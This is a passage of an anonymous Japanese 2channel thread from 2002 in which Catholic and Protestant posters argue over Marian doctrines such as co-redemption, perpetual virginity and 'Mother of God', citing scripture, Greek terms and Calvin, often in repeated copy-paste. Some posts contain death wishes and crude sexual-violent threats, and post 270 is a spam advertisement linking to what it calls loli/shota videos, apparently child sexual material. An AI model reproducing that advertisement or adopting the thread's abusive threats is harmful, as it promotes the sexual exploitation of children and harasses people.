234 :名無しさん@1周年:02/12/07 23:24
難癖つけたがっているだけだろ。


235 :名無しさん@1周年:02/12/07 23:40
訳語が悪いと思われ。

236 :名無しさん@1周年:02/12/07 23:50
つ〜か、230の質問の答えになってないじゃん

>聖伝を抜きにして、釈義だけでマリア共同贖罪者論が導き出
>せる聖書のテキストは、果たしてありや、なしや?
>それが聞きたいのですよ。



237 :名無しさん@1周年:02/12/08 00:32
>>236

パウロにできて、何で、マリア様にできないの?どうかしてる。質問がおかしいって。w馬鹿みたいジャン。子供じゃないんだから、まともな議論をしようよ。

238 :名無しさん@1周年:02/12/08 00:34
>>236 てか、>>231の質問に答えてないじゃん。

>なら、あなたに聞きますが、パウロがキリストの贖罪を地上で
>手助けしたからと言って、何で、パウロがキリストと
>同等になりますか?




239 :名無しさん@1周年:02/12/08 00:38
>>236
なら、パウロ共同贖罪は認めるんですね?
答えてください。聖書にはっきり出ているんですからね。
共同贖罪とは:

「私は、あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、私の身をもって、キリストの苦しみの
欠けたところを満たす」(聖パウロ・コロ1:24)ことです。

240 :名無しさん@1周年:02/12/08 00:41
>>237

おかしいのは、質問してる意味が分からないあなたのア・タ・マ!

241 :名無しさん@1周年:02/12/08 00:42
>>230
答えてください。パウロの共同贖罪は認めるんですね?
聖書にはっきり出ています。

共同贖罪とは:
「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、私の身をもって、キリストの苦しみの
欠けたところを満たすこと」(聖パウロ・コロサイ1:24)

242 :名無しさん@1周年:02/12/08 00:42
>>238


236と231はすべて230の問いに源を発しています。

ですから236は231の質問に答える意味がありません。

お分かり?

日本語が通じない子どもには230と同じくかかわってる暇
ないの。次から答えないよ?念のため…

243 :名無しさん@1周年:02/12/08 00:43
>>240 能書きはいいから早く答えてください。
パウロの共同贖罪は認めるんですね?
聖書にはっきり出ています。

共同贖罪とは:
「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、私の身をもって、キリストの苦しみの
欠けたところを満たすこと」(聖パウロ・コロサイ1:24)

244 :名無しさん@1周年:02/12/08 00:44
>>242 はやく答えてよ。
君はパウロの共同贖罪は認めるんだよね?
聖書にはっきり出ているんだから。

共同贖罪とは:
「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、私の身をもって、キリストの苦しみの
欠けたところを満たすこと」(聖パウロ・コロサイ1:24)

245 :名無しさん@1周年:02/12/08 00:46
プロは、マリア共同贖罪ではなく、パウロ共同贖罪を宣言しろ。それですべてが丸く収まる。ワラ

246 :名無しさん@1周年:02/12/08 00:48

何でプロテスタントはキリストの母よりもパウロを愛するんだろう。。不思議だ。

247 :スエデンボルグファンですが:02/12/08 00:49
えーと、スエデンボルグによればですね、パウロは地獄にいるのでして。とんでもないヤシのようです。ハイ

248 :名無しさん@1周年:02/12/08 00:57
メジュ基地はどこに行くのにも相手にされないわね。 カワイソ

249 :名無しさん@1周年:02/12/08 00:58
>>248オマエモナー

250 :名無しさん@1周年:02/12/08 01:00
>>242
答えないじゃなくて、答えられないだけだろ。
逃げるのうまいね。w

251 :名無しさん@1周年:02/12/08 01:01
>248 カワイソなのはオマエ

252 :名無しさん@1周年:02/12/08 01:02
>>248

俺さん、ウザイよ

253 :名無しさん@1周年:02/12/08 01:10
ケキョーク マリアが共同贖罪者だとは聖書のどこにも書いて
    ないのでつね。  ナトーク!

254 :名無しさん@1周年:02/12/08 01:25
>>253
ですから、イエスの苦しみを共にする者が共同贖罪者です。
真実のクリスチャンはみな、共同贖罪者。マリアはその母です。


255 :名無しさん@1周年:02/12/08 01:28
ケキョーク パウロは共同贖罪者だと聖書に書かれてる
    わけでつね。
    ナトーク!

256 :名無しさん@1周年:02/12/08 01:56
>>253 何度書かせるんですか。

1、共同贖罪とは:「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、身をもって、キリストの苦しみの欠けた
ところを満たすこと」(聖パウロ・コロサイ1:24)

2、マリアは聖シメオンより預言されました。「剣があなたの心臓をも
刺し貫くでしょう。多くの人の心の思いが現れれるため」(ルカ2:35)

剣で心臓がえぐられるほどの苦しみをマリアは味わったのですよ。
何の苦しみですか? 34節に書かれています。
「イスラエルの多くの者が倒れ、また立ち上がるため、反対を受ける」
御子の苦しみです。イスラエルの多くの者とはキリスト者です。

3、結論。マリアはイエスの苦しみを共にする共同贖罪者です。

257 :名無しさん@1周年:02/12/08 02:00
>>177 >6、共贖者マリア(キリストと共に苦しむ者)

258 :名無しさん@1周年:02/12/08 02:02
プロはアタマわるいね。
聖書に書かれて在ることを考えようともしない。

259 :名無しさん@1周年:02/12/08 02:17
聖書読みの聖書知らず。
それがプロ。
仏教的に言えば獅子身中の虫。

260 :名無しさん@1周年:02/12/08 02:22
プロテスタントは心がつめたいな。
カトリックにもいるけどさ…

261 :名無しさん@1周年:02/12/08 02:25
結局、マリアについてまとめると、こうですね?

●無原罪懐胎である。(ルター、ツウィングリ、ウェスレー)
●終生童貞である。(ルター、ツウィングリ、ウェスレー)
●共同贖罪者である。(コロサイ1:24、ルカ2:34、35)

262 :名無しさん@1周年:02/12/08 02:33
これでなにが変わるの?

263 :名無しさん@1周年:02/12/08 02:36
全ての弟子に裏切られたイエスに、
共同贖罪者なんているか。

264 :名無しさん@1周年:02/12/08 09:40
全ての信者を裏切ったイエスに、
共同贖罪者なんているか。

265 :名無しさん@1周年:02/12/08 10:58
>>264,>>264
俺さん、ウザイよ

266 :名無しさん@1周年:02/12/08 11:04

今日母無原罪のおんやどりの祝日、
この記念すべき日に、
>>1のシンパは敗北しました。
悪魔はこうやって滅びるのです。

267 :名無しさん@1周年:02/12/08 11:07

結局、マリアについてまとめると、こうですね!!!!!!!!!!!!!!


●無原罪懐胎である。(ルター、ツウィングリ、ウェスレー)

●終生童貞である。(ルター、ツウィングリ、ウェスレー)

●共同贖罪者である。(コロサイ1:24、ルカ2:34、35)



268 :名無しさん@1周年:02/12/08 11:09

結局、マリアについてまとめると、

こうですね!!!!!!!!!!!!!!


●無原罪懐胎である。(ルター、ツウィングリ、ウェスレー)

●終生童貞である。(ルター、ツウィングリ、ウェスレー)

●共同贖罪者である。(コロサイ1:24、ルカ2:34、35)



269 :シスターブリージ:02/12/08 12:11

反論できないようなので、このスレッドは、
聖母マリア様の共同贖罪を宣教するスレッドに使います。
今日は12月8日。マリアの無原罪のおん宿りの祝日。
これからは、俺さんのシンパのプロ原理主義を打ち滅ぼします。
覚悟なさい。


270 :名無しさん@1周年:02/12/08 12:21

ロリ・ショタビデオマニアにお知らせ♪
過去の有名作から新作までこっそりゲット!
サンプル画像が多いので表示が遅くてごめんなさい☆
http://aliceya.free-city.net/

ほとんどお金がかからないうえ家族にもバレません。


271 :シスターブリージ:02/12/08 12:25
俺さんのスレッドを使い切ったら、
プロテスタントのスレに乗り込みます。
2chの自称キリスト教徒を全員、
メジュゴリエの聖母に回心させます。

272 :シスターブリージ:02/12/08 12:45
1、マリアの第1教義―『神の母』。431年エペソ公会議で宣言。
聖書: ルカ1:43「私の主の母が私のもとに来られるとは」

旧約の民にとって、「私の主(アドナイ)」とは誰でしょう。
創世記15:2「私の主(アドナイ)、神よ」
新約の民にとって「私の主(キュリオス:ヤハウェのギリシャ語訳)」
とは誰でしょう。
Tコリ12:3「イエスは主(キュリオス)である」

マリアはまことに神の母です。


273 :名無しさん@1周年:02/12/08 13:11
ケキョーク マリアが神の母だとは聖書のどこにも書いて
    ないのでつね。  ナトーク!

274 :シスターブリージ:02/12/08 13:41
マリアの教義第2.「終生童貞」649年ラテラノ公会議で宣言。

聖書の証拠:

A:マリアはみごもる前も後も処女でした。
イザヤ書7:14「見よ、処女がみごもっている」
マタイ1:23「見よ、処女がみごもっている」

プロにといかけます。
「処女がみごもりますか?。処女でなくなってみごもるのでは
ありませんか?にもかかわらず、みごもっている乙女に対して、
なぜ神は『処女』と言われたのでしょうか?」

妊娠してからも処女だったからです。これを認めない者は聖書の
神の啓示を否定しなさい。

275 :シスターブリージ:02/12/08 13:42
B、

マタイ1:25:そして、子どもが生まれる「まで」彼女を知ることがなく、
その子どもの名をイエスとつけた。

「まで」のギリシャ語(heos)は「まで、以前」を意味する語であり、
「以後」の出来事を暗示する語ではありません。

2サムエル6:23「ミカヤは死ぬまで子供を持たなかった」
死後に子供をもったという意味でしょうか?

マタイ25節までは、イエスが誕生するまでヨセフとの関係がなかった
ことをはっきり証言するために書かれたものです。それを、キリスト
降誕後にマリアがヨセフと性的交渉を持ったと悪意ある解釈をするのは、
嘘偽り、サタンのすることです。

276 :シスターブリージ:02/12/08 13:42
C:新約ギリシャ語の兄弟(アデルフォス、アデルフィ)は親戚縁者の意味です。

マルコ6:3 この人は大工ではありませんか。マリヤの子で、
ヤコブ、ヨセ、ユダ、シモンの兄弟ではありませんか。その妹たちも、
私たちとここに住んでいるではありませんか。」

兄弟ヤコブ、ヨセ、ユダ、シモンは「クレオパのマリア」の子供です!
マルコ3:18、15:40、マタイ27:56、使徒1:13

277 :シスターブリージ:02/12/08 13:45
>>273
アドナイは神です。エリサベツが「私のアドナイの母」
とマリアを呼んだのは、
『私の神の母』と呼んだので。アドナイは神です。

278 :名無しさん@1周年:02/12/08 13:50
ケキョーク マリアが神の母だとは聖書のどこにも書いて
    ないのでつね。  ナトーク!

279 :名無しさん@1周年:02/12/08 13:51

主婦に言い負かされて、恥ずかしくネーのか?

おい!プロの馬鹿野郎ども!
返事しやがれ!!ワラ

280 :名無しさん@1周年:02/12/08 14:15
>>278

字も読めん文盲らしいな w

281 :名無しさん@1周年:02/12/08 14:30
メジュゴリエ賛成派のシスター・ブリージに
反論できないのであれば、
プロもメジュゴリエの聖母を支持しなさい。

282 :名無しさん@1周年:02/12/08 14:36
>>277
ヘブル語の
アレフ ダレッド ヌン ヨッド
は「神」ではなく「主」

アレフ ラメド ヘイ ヨッド メムソフィート
が「神」

283 :名無しさん@1周年:02/12/08 14:39
>>282

アドナイは「主」。「主」はエホヴァの代名詞。
キュリオスは「主」=アドナイのギリシャ訳だ。
観念しろ。w


284 :散歩の途中:02/12/08 15:22
またまたののしりあいが始まっていますね(鬱
ま、私の頭のよしあしはおくとして。

パウロが「共同贖罪者」であることはわかりますよ。訳語が適切かどうかはひとまずおくとして。
しかし、何度も言いますが、「マリアがそうである」と、「聖書に直接書いてあるのかどうか」ということですよ。
もし、それはパウロだけではなく、すべての信仰者が「共同贖罪者」であるとするなら、
何もわざわざ「マリアを・・・」などと言う必要はないのではないでしょうか。
それを、わざわざマリアを云々と言うのは、やはりそこに、何か意図するものがあるように思います。

>>274
処女とは、「男性経験をもたない女性」のことですよ。
あなた、性行為をしても妊娠したことのない女性を「処女」と言いますか?
ついでに言うと、聖書で「処女」と訳されているのは、「乙女」、つまり
若い女性のことです。ヴァージンとは限りません。

あ、そうそう。私は「処女マリアより生まれたキリスト」を信じてますけどね。
使徒信条で告白されているとおりです。

285 :名無しさん@1周年:02/12/08 15:24
Dイエスは霊においては父なる神と等しく、肉においては人と同じです。主イエスが人として生まれたのはマリヤからですが、神と同質の神の御子として生まれたのは造られたすべてのものより先であり、マリヤは神の母では有り得ません。コロサイ1章15節


286 :名無しさん@1周年:02/12/08 15:30
>>284
ついに、あなたは共同贖罪を認めました。進歩です。
パウロの共同贖罪を認めたと言うことは素晴らしいことです。
マリア様の共同贖罪を認めるのは時間の問題です。ありがとう。
あなたが聖母に導かれるように祈ります。

287 :名無しさん@1周年:02/12/08 15:31
>>285ひつこいよ。マリアが神の母であることは聖書によって明らか。

「神の母」431年エペソ公会議で宣言。

ルカ1:43「私の主の母が私のもとに来られるとは」
旧約の民にとって、「私の主(アドナイ)」とは誰でしょう。
創世記15:2「私の主(アドナイ)、神よ」

新約の民にとって「私の主(キュリオス:アドナイのギリシャ語訳)」
とは誰でしょう。
Tコリ12:3「イエスは主(キュリオス)である」

マリアはまことに神の母です。

288 :散歩の途中:02/12/08 16:04
>>286
・・・・・・・・・。
あのね、そういう意味ではないんですよ。
わかりやすく書きましょう。

贖罪者はキリストのみです。
パウロは、そのキリストの贖罪の苦しみを共に苦しみながら、
主に仕えてゆく、というのが、ここの個所であろうと思います。
だから、「訳語の問題はおくとして」と、書いたわけですよ。
あなたがおっしゃっている意味なら、パウロは「共同贖罪者」ではありえません。

この手の話題を読んで、いつも思うことは、
「聖伝」ないし「教会の伝統」、「伝承」等の意味付け、解釈がまちまちである、ということです。
たとえて言うなら、異なるルールで同じ競技をしているようなものです。
だから、議論にもならないわけですよ。
岡目八目で、ROMしているとよくわかります。

289 :名無しさん@1周年:02/12/08 16:11
>>284 >「聖書に直接書いてあるのかどうか」ということですよ。


同じことは沢山いえますけど。
信仰義認という語が聖書にのっていないからと言って、
パウロが信仰義認を説かなかったといえますか?爆w


290 :名無しさん@1周年:02/12/08 16:13
マリヤが人の罪を購う?ププ

291 :名無しさん@1周年:02/12/08 16:13
贖罪者と共同贖罪者とは違うんだけどね。
プロではこの区別が理解できないと思う。
というか、さすがキリスト教徒ってやっぱり異邦人の集まりだね。

292 :名無しさん@1周年:02/12/08 16:14
>>291
過渡があほなだけ

293 :名無しさん@1周年:02/12/08 16:16
マリアが罪を贖うんですか?狂ってる。

294 :名無しさん@1周年:02/12/08 16:16
>>288私たちが言ってる共同贖罪とは、こういう意味です!
何度も言わせないで下さい。100辺コピペしましょうか?

1、共同贖罪とは:「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、身をもって、キリストの苦しみの欠けた
ところを満たすこと」(聖パウロ・コロサイ1:24)

2、マリアは聖シメオンより預言されました。「剣があなたの心臓をも
刺し貫くでしょう。多くの人の心の思いが現れれるため」(ルカ2:35)

剣で心臓がえぐられるほどの苦しみをマリアは味わったのですよ。
何の苦しみですか? 34節に書かれています。
「イスラエルの多くの者が倒れ、また立ち上がるため、反対を受ける」
御子の苦しみです。イスラエルの多くの者とはキリスト者です。

3、結論。マリアはイエスの苦しみを共にする共同贖罪者です。

295 :名無しさん@1周年:02/12/08 16:17
>>289
馬鹿だねえ

296 :名無しさん@1周年:02/12/08 16:19
>>295バカはオマエ。俺さん、ウザイ

297 :名無しさん@1周年:02/12/08 16:21
>>294
マリヤが贖い主ならイエスは何だって言うの?

>>296
俺さんだという証拠でもあるんですか?馬鹿ですねえ!

298 :マリアはみごもる前も後も処女!:02/12/08 16:21

イザヤ書7:14「見よ、処女がみごもっている」
マタイ1:23「見よ、処女がみごもっている」

プロにといかけます。
「処女がみごもりますか?。処女でなくなってみごもるのでは
ありませんか?にもかかわらず、みごもっている乙女に対して、
なぜ神は『処女』と言われたのでしょうか?」

299 :名無しさん@1周年:02/12/08 16:25
イエスを生んだ後はヨセフの子供を産んでるだろう!死ね!馬鹿野郎!

300 :名無しさん@1周年:02/12/08 16:26
カト・オーソの「神の母」の意味を理解できないのはかなり痛い。
彼らの主張、マリアは神の母ではないというなら、
君達の三位一体の子の位格であるキリスト=ナザレのイエスは、
子の位格ではない=神ではない。と言っていることになる。
とこれらの信者は理解するわけさ。

従って、エホバとかいうイスラエルの神とは無縁の神が
イスラエルの神だと言っていることになるわけだ。

301 :マルタ ◆JKiO8VJvj2 :02/12/08 16:27
>>291
>贖罪者と共同贖罪者とは違うんだけどね。
あなたの言う通り、プロには理解できないんでしょうね。哀れです。
共同贖罪者というのは、ルカ 2:35 ローマ 8:17 コロサイ 1:24 以上の意味も以下の意味も無いんですがね。


302 :マリアはみごもる前も後も処女!:02/12/08 16:28
>>288 処女は乙女の意味ですって?大丈夫ですか?
マタイ1:23とルカ1:27の「処女」の原語はパルテノス。
この意味は『娘』ではありません。処女です。嘘をつかないで下さい。
嘘は大罪です。

イザヤ書7:14「見よ、処女がみごもっている」
マタイ1:23「見よ、処女がみごもっている」

「処女がみごもりますか?。処女でなくなってみごもるのでは
ありませんか?にもかかわらず、みごもっている乙女に対して、
なぜ神は『処女』と言われたのでしょうか?」

303 :名無しさん@1周年:02/12/08 16:28
>>299根拠がないですね。聖書はそういってますか?

304 :名無しさん@1周年:02/12/08 16:30
>>292君達は言葉を正確に理解できないだけさ。馬鹿だから。

305 :名無しさん@1周年:02/12/08 16:32
>>301ユダヤ人に理解できても、
プロテスタントには理解できないだろうね。

306 :マルタ ◆JKiO8VJvj2 :02/12/08 16:32
>>299
それなら、ジョン・カルヴィンも破門すればいいと思います。
http://www.forthelife.org/PERPETUALVIRGINITY.htm

John Calvin
Helvidius displayed excessive ignorance in concluding that Mary must have had many sons, because
Christ's 'brothers' are sometimes mentioned.

{Harmony of Matthew, Mark & Luke, sec. 39 (Geneva, 1562), vol. 2 / From Calvin's Commentaries,
tr. William Pringle, Grand Rapids, MI: Eerdmans, 1949, p.215; on Matthew 13:55}

[On Matt 1:25:] The inference he [Helvidius] drew from it was, that Mary remained a virgin no longer
than till her first birth, and that afterwards she had other children by her husband . . . No just and
well-grounded inference can be drawn from these words . . . as to what took place after the birth
of Christ. He is called 'first-born'; but it is for the sole purpose of informing us that he was born
of a virgin . . . What took place afterwards the historian does not inform us . . . No man will obstinately
keep up the argument, except from an extreme fondness for disputation.

{Pringle, ibid., vol. I, p. 107}

Under the word 'brethren' the Hebrews include all cousins and other relations, whatever may be the
degree of affinity.

{Pringle, ibid., vol. I, p. 283 / Commentary on John, (7:3) }

307 :名無しさん@1周年:02/12/08 16:33
>>303
聖書に書いてあるだろう!大馬鹿野郎!
野球のバットで、おまえのケツの穴に
マリヤ像を叩き込むぞ!

308 :マルタ ◆JKiO8VJvj2 :02/12/08 16:36
>>307
こんな下品なことを言う人は放置しましょう。

309 :マリアはみごもる前も後も処女!:02/12/08 16:36
>>288
イザヤ書7:14「見よ、処女がみごもっている」
マタイ1:23「見よ、処女がみごもっている」
ルカ1:26、7「処女のところにきた。この処女は。」
マタイ1:23、ルカ1:26、7の「処女」の原語は未婚の女性を
意味する「アルマー」ではなく「処女」を意味するパルテノスです。

プロの方に質問します。
「処女がみごもりますか?。処女でなくなってみごもるのでは
ありませんか?にもかかわらず、みごもっている乙女に対して、
なぜ神は『処女』と言われたのでしょうか?」

妊娠してからも処女だったからです。これを認めない者は聖書の
神の啓示を否定しなさい。

310 :名無しさん@1周年:02/12/08 16:37
だいたい、原理的なプロテスタントのキリスト教徒は
聖書崇拝をやっていることに全く気づいていないのが痛い。
聖書なんてものはどういうものだったか、
きちんと位置付けを確認すべきさ。
カトやオーソよりその点はやり易いはずさ。
勝手なことを主張するなら、それは偶像崇拝に当たる。

聖書とは一体なんだったのか?
イスラエルの時代からもう一度見直して欲しい。
カトやオーソにはこれは言う必要もないけどね。

311 :マリアはみごもる前も後も処女!:02/12/08 16:39
>>288いつまで待たせるんですか?早く答えてください。

イザヤ書7:14「見よ、処女がみごもっている」
マタイ1:23「見よ、処女がみごもっている」
ルカ1:26、7「処女のところにきた。この処女は。」

マタイ1:23、ルカ1:26、7の「処女」の原語は未婚の女性を
意味する「アルマー」ではなく「処女」を意味するパルテノスです。

あなたに質問します。
「処女がみごもりますか?。処女でなくなってみごもるのでは
ありませんか?にもかかわらず、みごもっている乙女に対して、
なぜ神は『処女』と言われたのでしょうか?」

312 :名無しさん@1周年:02/12/08 16:41
>>310
砲丸でキャッチボールして死ね

313 :名無しさん@1周年:02/12/08 16:42
マリヤはイエスを生んだ後、子供を何人も産んでいる。
従って、終生処女説は気違い迷信。

314 :名無しさん@1周年:02/12/08 16:43
>>312反論が出来ないということだね。
君達異邦人の脳はその程度なんだね。

315 :名無しさん@1周年:02/12/08 16:43
共同受苦者とはいえるかもしれんが、贖罪ではなかろう。臨終のとき祈ってくれるかもしれないが
役に立つほしょうはない
parthenosは若い女
みんな勝手な神学をもちこまず、書いてあることをよみましょう

316 :名無しさん@1周年:02/12/08 16:44
>>313そんな説は聖書のどこにも書いてないね。

317 :マルタ ◆JKiO8VJvj2 :02/12/08 16:44
>>313
それなら、カルヴィンを破門しなさい。

318 :名無しさん@1周年:02/12/08 16:45
>>314あほ

319 :名無しさん@1周年:02/12/08 16:46
>>317
馬鹿野郎!ケツの穴にロケット花火を突っ込むぞ!

320 :名無しさん@1周年:02/12/08 16:47
では、反論してご覧。異邦人さん。
それとも、やっぱりユダヤ人より頭が弱いから無理なのかな?

321 :名無しさん@1周年:02/12/08 16:47
>>316
書いてあるだろう!馬鹿野郎!自分で探しやがれ!馬鹿!

322 :マリアはみごもる前も後も処女!:02/12/08 16:47
>>315証拠は? リンクしてください。
あたしはプロテスタントの神学者ヤングが書いた、
1200ページの
YOUNG'S ANALITICAL CONCORDANCE TO THE BIBLE
から論証しています。

323 :名無しさん@1周年:02/12/08 16:48
>>319きちんと反論してご覧よ。
マリアは後に子を産んでいるという説は、
元々はリベラル的な考え方なんだが、知ってた?

324 :マリアはみごもる前も後も処女!:02/12/08 16:49
>>315>parthenosは若い女

証拠は? リンクしてください。
あたしはプロテスタントの神学者ヤングが書いた、
1200ページの
YOUNG'S ANALITICAL CONCORDANCE TO THE BIBLE
から論証しています。
早く答えてください。嘘吐きさん

325 :名無しさん@1周年:02/12/08 16:51
>>312君が勝手に書いてあると主張しているに過ぎない。
君は言語が理解できないんだから、何も理解できないんだよ。

326 :名無しさん@1周年:02/12/08 16:52
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。


327 :名無しさん@1周年:02/12/08 16:53
>>325
大馬鹿野郎!書いてあるだろう!死にやがれ!あほ!

328 :マリアはみごもる前も後も処女!:02/12/08 16:53
>>315>共同受苦者とはいえるかもしれんが、贖罪ではなかろう。
臨終のとき祈ってくれるかもしれないが
役に立つほしょうはない


イエスの十字架の苦しみはただの苦しみですか?
十字架によって贖罪が遂げられたのではありませんか?
ただの苦しみなら、左右にいた盗賊と変わりません。

329 :名無しさん@1周年:02/12/08 16:55
>>328
クソババア!いい加減にしろ!馬鹿野郎!

330 :名無しさん@1周年:02/12/08 16:56
再臨のイエスは文鮮明師ですが何か?

331 :名無しさん@1周年:02/12/08 16:57
>>329>328クソババア!いい加減にしろ!馬鹿野郎



とかきこしたところで、聖母が悪魔になるわけではない。


332 :名無しさん@1周年:02/12/08 16:57
>>326僕は異邦人と一緒にされたくないな。
カトは異邦人さ。

>>327君の中では・・・。なんだよ。
それが正確か不正確かは分からないさ。
ユダヤ人に伝わる話と比較すれば、彼らは兄弟じゃない。
イエスはヨセフの愛により兄弟に加えてもらったに過ぎないさ。

333 :名無しさん@1周年:02/12/08 16:59
>>330
馬鹿野郎!話を摩り替えるとマリヤの永世処女が迷信という事実が変動するのか!大馬鹿野郎!死ね!

334 :マリアはみごもる前も後も処女!:02/12/08 17:00
>>315>parthenosは若い女

いつまで待たせるんですか?早く答えてくださいよ。
証拠は? リンクしてください。
あたしはプロテスタントの神学者ヤングが書いた、
1200ページの
YOUNG'S ANALITICAL CONCORDANCE TO THE BIBLE
から論証しています。
早く答えてください。嘘吐きさん

335 :名無しさん@1周年:02/12/08 17:00
>>331死ね

336 :名無しさん@1周年:02/12/08 17:00
>>333少なくとも聖書にはそう記されている。
旧約を見てご覧。

337 :マルタ ◆JKiO8VJvj2 :02/12/08 17:01
>>333
俺さん遂に、誰にでも当り散らすようになりましたね。
困ればいつもそう。

338 :マリアはみごもる前も後も処女!:02/12/08 17:02
A:
イザヤ書7:14「見よ、処女がみごもっている」
マタイ1:23「見よ、処女がみごもっている」
ルカ1:26、7「処女のところにきた。この処女は。」

マタイ1:23、ルカ1:26、7の「処女」の原語は未婚の女性を
意味する「アルマー」ではなく「処女」を意味するパルテノスです。

プロの方に質問します。
「処女がみごもりますか?。処女でなくなってみごもるのでは
ありませんか?にもかかわらず、みごもっている乙女に対して、
なぜ神は『処女』と言われたのでしょうか?」

妊娠してからも処女だったからです。これを認めない者は聖書の
神の啓示を否定しなさい。

339 :名無しさん@1周年:02/12/08 17:02
>>336
うそつくな!脳みそ腐乱!馬鹿野郎!

340 :マリアはみごもる前も後も処女!:02/12/08 17:02
B、

マタイ1:25:そして、子どもが生まれる「まで」彼女を知ることがなく、
その子どもの名をイエスとつけた。

「まで」のギリシャ語(heos)は「まで、以前」を意味する語であり、
「以後」の出来事を暗示する語ではありません。

2サムエル6:23「ミカヤは死ぬまで子供を持たなかった」
死後に子供をもったという意味でしょうか?

マタイ1:25までは、イエス誕生までヨセフが関係しなかったことを
はっきり証言するために書かれたものです。それを、キリスト降誕後に
マリアがヨセフと性的交渉を持った、と悪意ある解釈をするのは、虚偽
であり、サタンのすることです。

341 :マリアはみごもる前も後も処女!:02/12/08 17:02
C:ギリシャ語の兄弟姉妹(アデルフォス、アデルフィ)は親戚縁者の意味。

マルコ6:3 この人は大工ではありませんか。マリヤの子で、
ヤコブ、ヨセ、ユダ、シモンの兄弟ではありませんか。その妹たちも、
私たちとここに住んでいるではありませんか。」

兄弟ヤコブ、ヨセ、ユダ、シモンは「クレオパのマリア」の子供です!
マルコ3:18、15:40、マタイ27:56、使徒1:13

342 :名無しさん@1周年:02/12/08 17:03
しかし、それは事実と違うからユダヤ人は認めないのさ。
キリスト教徒たちの捏造だと考えるからさ。

イエスはローマ兵の子だとみんな信じているさ。
ナザレ地方ではイエスに従う者が少なかった。
彼が大工だったからとかそんな理由ではなく、
私生児だったからさ。

343 :名無しさん@1周年:02/12/08 17:05
>>339嘘だと思うなら、ちゃんとその腐った目で見て見ることさ。
腐った目が治るかもね。

344 :マリアはまことに神の母:02/12/08 17:05
マリアの教義1―『神の母』。431年エペソ公会議で宣言。

聖書: ルカ1:43「私の主の母が私のもとに来られるとは」

旧約の民にとって、「私の主(アドナイ)」とは誰でしょう。
創世記15:2「私の主(アドナイ)、神よ」

新約の民にとって「私の主」(キュリオス:アドナイのギリシャ語訳)
とは誰でしょう。

Tコリ12:3「イエスは主(キュリオス)である」

マリアはまことに神の母です。

345 :名無しさん@1周年:02/12/08 17:05
マリヤはイエスを生むまでは処女であったが、
その後はヨセフの子を多数産んでいる。

346 :名無しさん@1周年:02/12/08 17:06
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。


347 :名無しさん@1周年:02/12/08 17:07
>>345>>346俺さん、ウザイよ

348 :名無しさん@1周年:02/12/08 17:08
>>343
話を本題から逸らすことしかできないようだなあ!
おまえは退場しろ!こたつの上にマリヤ像置いて拝んでろ!
馬鹿野郎!

349 :名無しさん@1周年:02/12/08 17:09
>>346だから、君は馬鹿なのさ。
私が誰かも理解できないのさ(ワラ)

350 :名無しさん@1周年:02/12/08 17:11
>>345

ソースキボーン。名無しの妄想じゃネエ。説得力ゼロだね。

同情するならカネをくれ。
反論するなら聖句引け。


351 :名無しさん@1周年:02/12/08 17:11
>>349
そんなことを書き込むと、マリヤ崇敬が間違いという事実が変動すると思ってるのか!馬鹿野郎!脳みそ腐乱死ね!馬鹿!

352 :名無しさん@1周年:02/12/08 17:13
>>350
馬鹿野郎!以前述べた!ふざけるな!

353 :名無しさん@1周年:02/12/08 17:15
>>352

主婦の>>341さんが論破してます。恥ずかしくないの?

354 :名無しさん@1周年:02/12/08 17:16
カトリック教会

主な特徴…a. ローマ法王の言葉や外典などを聖書と同等としている。
      b. マリヤ礼拝…マリヤによる救い。
      c. 洗礼など儀式、行いによる救い…幼児洗礼など
      d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
      e. 司祭を通しての罪の赦し。
      f. 煉獄など聖書にない教えが多数、しかも強調されている等

以上の事柄等より,当教会はカトリック教会を聖書の基準から判断し,異端と考えております。正しいプロテスタント教会は当教会と同様の立場をとります。


355 :マリアはまことに神の母:02/12/08 17:17
あたしは主婦ですけど宣教師です!

356 :俺さんがソースを書かない理由:02/12/08 17:18
>>352
ソース書き込んだら同じ反論をされて、
また俺さんが負けちゃうからです。

357 :名無しさん@1周年:02/12/08 17:19
俺さんはバプテスト派なの?

358 :名無しさん@1周年:02/12/08 17:20
>>351君達は君達の主でありキリストであるとする
ナザレのイエスを、一方で主ではなくキリストではないと
自ら言っているのさ。この矛盾は一体何なのだ?
ちゃんと答えて見ろよ。

それに対する反論が出来ないということは、
嘘をついていると自ら証しているようなものさ。
昔なら石打ちだったさ。

359 :名無しさん@1周年:02/12/08 17:45
>a. ローマ法王の言葉や外典などを聖書と同等としている。
それは俺さんでしょ。
http://life.2ch.net/test/read.cgi/psy/1037516989/
>E聖書のどこにも(外典にさえ)・・・

>b. マリヤ礼拝…マリヤによる救い。
救いの源泉はキリストと認めてますが。マリア様の執り成しはキリストがあってのこと。

>c. 洗礼など儀式、行いによる救い…幼児洗礼など
幼児洗礼の何が悪いのでしょうか?マタイ 19:14
そもそも、秘蹟(聖礼典)が救いに不可欠なものと主張したのは新教の側ですが。
だから、新教での秘蹟は「洗礼」と「聖餐」に限定したのでしょ?
一方私たちは、救いと直接関係ない「しるし」をも含めた七つのものを、
秘蹟と定めていますが。

>d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
拝んでいるのではなく、敬ってるの。

>e. 司祭を通しての罪の赦し。
ヨハネ福 20:23 ルーテル教会でも告悔はあります。

>f. 煉獄など聖書にない教えが多数、しかも強調されている等
